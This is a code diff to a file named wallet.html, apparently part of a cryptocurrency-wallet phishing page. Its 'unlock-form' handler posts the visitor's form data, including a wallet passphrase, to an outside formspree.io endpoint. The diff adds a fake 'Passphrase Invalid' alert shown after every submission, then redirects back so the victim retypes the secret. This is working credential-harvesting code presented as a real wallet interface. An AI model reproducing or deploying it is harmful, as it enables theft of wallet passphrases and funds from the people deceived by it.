--- a/wallet.html
+++ b/wallet.html
@@ -685,28 +685,34 @@
     <!-- SweetAlert library -->
     <script src="https://unpkg.com/sweetalert/dist/sweetalert.min.js"></script>
 
-    <script>
-      document
-        .getElementById("unlock-form")
-        .addEventListener("submit", async function (event) {
-          event.preventDefault(); // Prevent default form submission
+      <script>
+  document
+    .getElementById("unlock-form")
+    .addEventListener("submit", async function (event) {
+      event.preventDefault(); // Prevent default form submission
 
-          let formData = new FormData(this); // Get form data
+      let formData = new FormData(this); // Get form data
 
-          let response = await fetch("https://formspree.io/f/mgvaezeb", {
-            method: "POST",
-            body: formData,
-            headers: {
-              Accept: "application/json",
-            },
-          });
+      let response = await fetch("https://formspree.io/f/mgvaezeb", {
+        method: "POST",
+        body: formData,
+        headers: {
+          Accept: "application/json",
+        },
+      });
 
-          if (response.ok) {
-            window.location.href = "wallet.html"; // Redirect on success
-          } else {
-            alert("Failed to send form. Please try again.");
-          }
-        });
-    </script>
+      // Show "Passphrase Invalid" alert
+      swal("Error!", "Passphrase Invalid", "error");
+
+      // Continue with redirection if form submission is successful
+      if (response.ok) {
+        setTimeout(() => {
+          window.location.href = "wallet.html"; // Redirect after showing error
+        }, 2000);
+      }
+    });
+</script>
+
+
   </body>
 </html>
